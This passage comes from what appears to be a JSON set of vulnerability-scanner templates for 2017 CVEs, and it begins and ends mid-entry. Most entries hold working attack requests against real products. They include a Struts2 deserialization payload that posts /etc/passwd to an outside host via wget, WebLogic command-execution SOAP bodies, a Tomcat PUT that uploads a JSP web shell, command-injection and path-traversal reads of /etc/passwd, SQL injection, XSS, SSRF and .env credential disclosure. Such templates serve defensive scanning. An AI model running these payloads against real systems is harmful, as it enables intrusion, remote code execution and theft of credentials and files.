Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5487","info":{"name":"WordPress Core <4.7.1 - Username Enumeration","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/users/","{{BaseURL}}/?rest_route=/wp/v2/users/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"avatar_urls\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","name":"usernames","json":[".[] | .slug",".[].name"],"part":"body"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["projectdiscovery.io"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6dd70f16549456495373a337e6708865"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5('phpcollab_rce');?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["48dbd2384cb6b996fa1e2855c7f0567f"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site 